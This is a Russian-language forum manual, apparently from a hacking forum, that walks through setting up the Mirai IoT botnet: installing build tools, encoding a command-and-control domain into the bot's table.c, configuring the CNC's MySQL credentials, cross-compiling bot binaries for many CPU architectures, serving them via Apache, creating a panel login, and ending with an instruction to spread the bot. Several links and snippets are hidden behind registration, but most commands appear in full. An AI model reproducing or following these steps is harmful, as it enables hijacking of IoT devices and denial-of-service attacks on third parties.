Установка и настройка ботнета Mirai
- Описание что это и для чего:
Скрытое содержимое доступно для зарегистрированных пользователей!
- Собственно сам мануал:
Подключаемся к нашему серверу через PuTTY и начинаем.
# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang electric-fence screen sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
При установке MySQL, нужно будет создать пароль для доступа к MySQL для root пользователя. Пароль нормальный придумаете, без всяких "qwerty ".
# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
# bash < <(curl -s -S -L
Скрытое содержимое доступно для зарегистрированных пользователей!
)# gvm install go1.4
# gvm use go1.4 [--default]
# gvm install go1.4 -B
# gvm use go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm use go1.5
# gvm install go1.8
# gvm use go1.8
После установки всех утилит, качаем исходники бота -
Скрытое содержимое доступно для зарегистрированных пользователей!
и загружаем на сервер. Командой wget, или просто через программу WinSCP.# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su (свой домен пишем, который прикрутили к серверу и жмем Enter).
Тут вы увидите такой текст:
XOR'ing 14 bytes of data...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
Копируем весь этот текст.
Открываем через nano редактор, или же через WinSCP файл table.c который находится в папке mirai/bot. Должны увидеть это -
Скрытое содержимое доступно для зарегистрированных пользователей!
.Строка add_entry (TABLE_CNC_DOMAIN) - всё что в кавычках меняем на свой текст, который только что скопировали. Вместо "30" пишем свою цифру, которую тоже только что скопировали. Тоже самое делаем с строкой add_entry(TABLE_SCAN_CB_DOMAIN).
Сохраняем, и закрываем редактор. Идем дальше.
Открываем редактором файл mirai/cnc/main.go. Видим это -
Скрытое содержимое доступно для зарегистрированных пользователей!
. "127.0.0.1" меняем на "127.0.0.1:3306", "password" меняем на наш MySQL пароль который вводили ранее. Сохраняем файл, и закрываем редактор. Далее просто копируем все, что находится ниже.# mkdir /etc/xcompile
# cd /etc/xcompile
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# wget
Скрытое содержимое доступно для зарегистрированных пользователей!
# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2
# rm *.tar.bz2
# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l
# export PATH=$PATH:/etc/xcompile/armv4l/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go
# go get github.com/go-sql-driver/mysql
# go get github.com/mattn/go-shellwords
# cd Mirai-Source-Code-master/mirai
# ./build.sh debug telnet
# ./build.sh release telnet
# cd Mirai-Source-Code-master/mirai/release
# mv mirai* /var/www/html
# cd /var/www/html
# mkdir bins
# mv * bins/
# cd
Теперь MySQL.
# mysql -u root -p
Тут попросят пароль. Вводим пароль который ранее установили.
# create database mirai;
# use mirai
Теперь копируем весь текст -
Скрытое содержимое доступно для зарегистрированных пользователей!
вставляем, и жмем Enter.Копируем этот текст -
Скрытое содержимое доступно для зарегистрированных пользователей!
Вместо anna-senpai пишем свой логин. Любой. Так же и с myawesomepassword. Эти данные нам нужны будут для доступа в панель управления ботом.
Должно быть вот так - INSERT INTO users VALUES (NULL, 'login', 'password', 0, 0, 0, 0, -1, 1, 30);
Копируем, вставляем, жмем Enter. Теперь можно выходить.
# exit
Уже почти всё.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# screen ./cnc
Должны увидеть надпись MySQL DB opened. Не закрываем эту сессию, открываем новую.
Скрытое содержимое доступно для зарегистрированных пользователей!
вместо vlmi.su пишем свой домен, и жмем Open. Вводим логин и пароль.Всё, мы в панели управления ботом. Теперь вам осталось распространить своего бота.